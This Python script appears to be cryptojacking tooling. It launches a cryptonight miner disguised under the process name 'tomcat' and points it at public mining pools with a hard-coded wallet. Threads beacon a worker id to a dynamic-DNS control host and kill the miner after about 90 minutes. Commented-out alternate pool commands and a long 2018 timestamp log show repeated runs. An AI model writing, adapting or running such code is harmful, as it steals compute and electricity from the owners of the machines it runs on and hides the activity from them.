import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:09.641740
#2018-02-17 16:33:06.221267
#2018-02-17 18:21:07.282914
#2018-02-17 20:09:04.953243
#2018-02-17 21:56:01.602695
#2018-02-17 23:41:06.375778
#2018-02-18 01:31:03.466576
#2018-02-18 03:17:07.155736
#2018-02-18 05:06:05.867863
#2018-02-18 06:59:02.126312
#2018-02-18 08:47:06.347376
#2018-02-18 10:34:05.003252
#2018-02-18 12:19:05.988934
#2018-02-18 14:06:05.478573
#2018-02-18 15:56:05.755273
#2018-02-18 17:46:04.166279
#2018-02-18 19:34:06.371951
#2018-02-18 21:19:05.915972
#2018-02-18 23:06:04.081888
#2018-02-19 00:53:02.011879
#2018-02-19 02:40:04.095366
#2018-02-19 04:27:05.355925
#2018-02-19 06:13:07.353356
#2018-02-19 07:59:08.216856
#2018-02-19 09:50:04.160065
#2018-02-19 11:39:08.813951
#2018-02-19 13:26:01.603869
#2018-02-19 15:16:05.915666
#2018-02-19 17:05:08.128668
#2018-02-19 18:51:04.373642
#2018-02-19 20:29:04.535285
#2018-02-19 22:17:04.001470
#2018-02-20 00:04:05.859424
#2018-02-20 01:52:03.760880
#2018-02-20 03:40:01.356782
#2018-02-20 05:25:08.468755
#2018-02-20 07:09:04.770502
#2018-02-20 08:55:05.169742
#2018-02-20 10:39:01.249261
#2018-02-20 12:25:01.996672
#2018-02-20 14:11:07.374488
#2018-02-20 15:54:01.947157
#2018-02-20 17:41:08.496956
#2018-02-20 19:29:08.042334
#2018-02-20 21:17:07.579061
#2018-02-20 23:03:04.736648
#2018-02-21 00:47:06.995805
#2018-02-21 02:31:05.619681
#2018-02-21 04:18:03.402876
#2018-02-21 06:04:06.320153
#2018-02-21 07:52:06.001444
#2018-02-21 09:36:07.071404
#2018-02-21 11:23:08.225931
#2018-02-21 13:13:01.600083
#2018-02-21 14:58:09.691236
#2018-02-21 16:46:01.450378
#2018-02-21 18:36:04.584525
#2018-02-21 20:20:09.355275
#2018-02-21 22:08:01.426258
#2018-02-21 23:54:04.936242
#2018-02-22 01:42:01.346825
#2018-02-22 03:30:01.675606
#2018-02-22 05:16:07.511340
#2018-02-22 07:02:06.830404
#2018-02-22 08:50:05.708896
#2018-02-22 10:38:06.605681
#2018-02-22 12:24:05.794746
#2018-02-22 14:09:05.605243
#2018-02-22 15:56:01.674441
#2018-02-22 17:42:08.024015
#2018-02-22 19:31:07.345831
#2018-02-22 21:23:05.879529
#2018-02-22 23:08:01.757021
#2018-02-23 00:55:07.622022
#2018-02-23 02:42:06.369936
#2018-02-23 04:30:06.029162
#2018-02-23 06:15:07.698406
#2018-02-23 08:02:06.963213
#2018-02-23 10:18:01.307693
#2018-02-23 12:12:01.880220
#2018-02-23 14:00:10.627403
#2018-02-23 15:53:06.603383
#2018-02-23 17:40:06.987458
#2018-02-23 19:26:05.167455
#2018-02-23 21:10:09.020419
#2018-02-23 22:57:02.070289
#2018-02-24 00:45:08.194369
#2018-02-24 02:39:05.041030
#2018-02-24 04:33:02.151528
#2018-02-24 06:17:05.014911
#2018-02-24 09:00:09.495728
#2018-02-24 10:41:01.910254
#2018-02-24 12:28:05.716141
#2018-02-24 14:19:07.887775
#2018-02-24 16:07:04.517522
#2018-02-24 17:58:01.289053
#2018-02-24 19:46:08.040810
#2018-02-24 21:31:04.212339
#2018-02-25 00:16:04.373235
#2018-02-25 03:26:06.430126
#2018-02-25 07:10:07.396601